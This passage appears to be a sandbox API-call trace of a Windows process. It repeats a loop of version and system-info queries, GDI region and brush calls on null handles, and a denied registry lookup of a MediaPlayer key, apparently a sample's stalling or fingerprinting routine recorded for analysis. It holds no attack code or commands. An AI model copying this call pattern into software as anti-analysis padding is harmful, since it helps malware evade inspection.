0x1100b60 [0087.773] DeleteObject (ho=0x1100b60) returned 1 [0087.773] DeleteObject (ho=0x670401d3) returned 1 [0087.773] DeleteObject (ho=0x650401d6) returned 1 [0087.773] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.773] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.773] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.773] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.773] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.773] BeginPath (hdc=0x0) returned 0 [0087.773] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.773] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.773] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.773] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.773] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.773] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.773] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.773] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.773] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x680401d3 [0087.773] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x660401d6 [0087.773] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b61 [0087.773] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b62 [0087.773] CombineRgn (hrgnDst=0x1040b61, hrgnSrc1=0x680401d3, hrgnSrc2=0x660401d6, iMode=1) returned 1 [0087.773] CombineRgn (hrgnDst=0x1040b62, hrgnSrc1=0x680401d3, hrgnSrc2=0x660401d6, iMode=4) returned 2 [0087.773] CreateSolidBrush (color=0xff) returned 0x2100b60 [0087.773] CreateSolidBrush (color=0xff0000) returned 0x1100b63 [0087.773] DeleteObject (ho=0x1100b63) returned 1 [0087.773] DeleteObject (ho=0x660401d6) returned 1 [0087.773] DeleteObject (ho=0x680401d3) returned 1 [0087.773] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.773] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.773] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.773] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.773] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.773] BeginPath (hdc=0x0) returned 0 [0087.773] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.773] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.773] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.773] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.773] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.773] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.774] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.774] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.774] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x670401d6 [0087.774] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x690401d3 [0087.774] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b64 [0087.774] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b65 [0087.774] CombineRgn (hrgnDst=0x1040b64, hrgnSrc1=0x670401d6, hrgnSrc2=0x690401d3, iMode=1) returned 1 [0087.774] CombineRgn (hrgnDst=0x1040b65, hrgnSrc1=0x670401d6, hrgnSrc2=0x690401d3, iMode=4) returned 2 [0087.774] CreateSolidBrush (color=0xff) returned 0x2100b63 [0087.774] CreateSolidBrush (color=0xff0000) returned 0x1100b66 [0087.774] DeleteObject (ho=0x1100b66) returned 1 [0087.774] DeleteObject (ho=0x690401d3) returned 1 [0087.774] DeleteObject (ho=0x670401d6) returned 1 [0087.774] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.774] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.774] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.774] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.774] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.774] BeginPath (hdc=0x0) returned 0 [0087.774] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.774] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.774] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.774] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.774] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.774] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.774] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.774] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.774] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6a0401d3 [0087.774] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x680401d6 [0087.774] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b67 [0087.774] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b68 [0087.774] CombineRgn (hrgnDst=0x1040b67, hrgnSrc1=0x6a0401d3, hrgnSrc2=0x680401d6, iMode=1) returned 1 [0087.774] CombineRgn (hrgnDst=0x1040b68, hrgnSrc1=0x6a0401d3, hrgnSrc2=0x680401d6, iMode=4) returned 2 [0087.774] CreateSolidBrush (color=0xff) returned 0x2100b66 [0087.774] CreateSolidBrush (color=0xff0000) returned 0x1100b69 [0087.774] DeleteObject (ho=0x1100b69) returned 1 [0087.774] DeleteObject (ho=0x680401d6) returned 1 [0087.774] DeleteObject (ho=0x6a0401d3) returned 1 [0087.774] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.774] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.775] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.775] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.775] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.775] BeginPath (hdc=0x0) returned 0 [0087.775] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.775] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.775] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.775] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.775] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.775] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.775] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.775] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.775] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x690401d6 [0087.775] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6b0401d3 [0087.775] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b6a [0087.775] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b6b [0087.775] CombineRgn (hrgnDst=0x1040b6a, hrgnSrc1=0x690401d6, hrgnSrc2=0x6b0401d3, iMode=1) returned 1 [0087.775] CombineRgn (hrgnDst=0x1040b6b, hrgnSrc1=0x690401d6, hrgnSrc2=0x6b0401d3, iMode=4) returned 2 [0087.775] CreateSolidBrush (color=0xff) returned 0x2100b69 [0087.775] CreateSolidBrush (color=0xff0000) returned 0x1100b6c [0087.775] DeleteObject (ho=0x1100b6c) returned 1 [0087.775] DeleteObject (ho=0x6b0401d3) returned 1 [0087.775] DeleteObject (ho=0x690401d6) returned 1 [0087.775] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.775] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.775] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.775] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.775] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.775] BeginPath (hdc=0x0) returned 0 [0087.775] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.775] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.775] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.775] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.775] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.775] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.775] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.775] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.776] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6c0401d3 [0087.776] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6a0401d6 [0087.776] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b6d [0087.776] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b6e [0087.776] CombineRgn (hrgnDst=0x1040b6d, hrgnSrc1=0x6c0401d3, hrgnSrc2=0x6a0401d6, iMode=1) returned 1 [0087.776] CombineRgn (hrgnDst=0x1040b6e, hrgnSrc1=0x6c0401d3, hrgnSrc2=0x6a0401d6, iMode=4) returned 2 [0087.776] CreateSolidBrush (color=0xff) returned 0x2100b6c [0087.776] CreateSolidBrush (color=0xff0000) returned 0x1100b6f [0087.776] DeleteObject (ho=0x1100b6f) returned 1 [0087.776] DeleteObject (ho=0x6a0401d6) returned 1 [0087.776] DeleteObject (ho=0x6c0401d3) returned 1 [0087.776] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.776] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.776] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.776] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.776] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.776] BeginPath (hdc=0x0) returned 0 [0087.776] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.776] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.776] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.776] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.776] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.776] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.776] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.776] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.776] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6b0401d6 [0087.776] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6d0401d3 [0087.776] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b70 [0087.776] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b71 [0087.776] CombineRgn (hrgnDst=0x1040b70, hrgnSrc1=0x6b0401d6, hrgnSrc2=0x6d0401d3, iMode=1) returned 1 [0087.776] CombineRgn (hrgnDst=0x1040b71, hrgnSrc1=0x6b0401d6, hrgnSrc2=0x6d0401d3, iMode=4) returned 2 [0087.776] CreateSolidBrush (color=0xff) returned 0x2100b6f [0087.776] CreateSolidBrush (color=0xff0000) returned 0x1100b72 [0087.776] DeleteObject (ho=0x1100b72) returned 1 [0087.776] DeleteObject (ho=0x6d0401d3) returned 1 [0087.776] DeleteObject (ho=0x6b0401d6) returned 1 [0087.776] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.776] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.777] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.777] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.777] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.777] BeginPath (hdc=0x0) returned 0 [0087.777] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.777] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.777] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.777] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.777] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.777] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.777] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.777] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.777] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6e0401d3 [0087.777] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6c0401d6 [0087.777] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b73 [0087.777] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b74 [0087.777] CombineRgn (hrgnDst=0x1040b73, hrgnSrc1=0x6e0401d3, hrgnSrc2=0x6c0401d6, iMode=1) returned 1 [0087.777] CombineRgn (hrgnDst=0x1040b74, hrgnSrc1=0x6e0401d3, hrgnSrc2=0x6c0401d6, iMode=4) returned 2 [0087.777] CreateSolidBrush (color=0xff) returned 0x2100b72 [0087.777] CreateSolidBrush (color=0xff0000) returned 0x1100b75 [0087.777] DeleteObject (ho=0x1100b75) returned 1 [0087.777] DeleteObject (ho=0x6c0401d6) returned 1 [0087.777] DeleteObject (ho=0x6e0401d3) returned 1 [0087.777] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.777] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.777] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.777] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.777] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.777] BeginPath (hdc=0x0) returned 0 [0087.777] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.777] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.777] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.777] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.777] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.777] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.777] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.777] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.778] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6d0401d6 [0087.778] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6f0401d3 [0087.778] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b76 [0087.778] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b77 [0087.778] CombineRgn (hrgnDst=0x1040b76, hrgnSrc1=0x6d0401d6, hrgnSrc2=0x6f0401d3, iMode=1) returned 1 [0087.778] CombineRgn (hrgnDst=0x1040b77, hrgnSrc1=0x6d0401d6, hrgnSrc2=0x6f0401d3, iMode=4) returned 2 [0087.778] CreateSolidBrush (color=0xff) returned 0x2100b75 [0087.778] CreateSolidBrush (color=0xff0000) returned 0x1100b78 [0087.778] DeleteObject (ho=0x1100b78) returned 1 [0087.778] DeleteObject (ho=0x6f0401d3) returned 1 [0087.778] DeleteObject (ho=0x6d0401d6) returned 1 [0087.778] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.778] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.778] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.778] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.778] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.778] BeginPath (hdc=0x0) returned 0 [0087.778] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.778] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.778] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.778] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.778] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.778] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.778] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.778] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.778] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x700401d3 [0087.778] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6e0401d6 [0087.778] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b79 [0087.778] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b7a [0087.778] CombineRgn (hrgnDst=0x1040b79, hrgnSrc1=0x700401d3, hrgnSrc2=0x6e0401d6, iMode=1) returned 1 [0087.778] CombineRgn (hrgnDst=0x1040b7a, hrgnSrc1=0x700401d3, hrgnSrc2=0x6e0401d6, iMode=4) returned 2 [0087.778] CreateSolidBrush (color=0xff) returned 0x2100b78 [0087.778] CreateSolidBrush (color=0xff0000) returned 0x1100b7b [0087.778] DeleteObject (ho=0x1100b7b) returned 1 [0087.778] DeleteObject (ho=0x6e0401d6) returned 1 [0087.778] DeleteObject (ho=0x700401d3) returned 1 [0087.779] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.779] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, 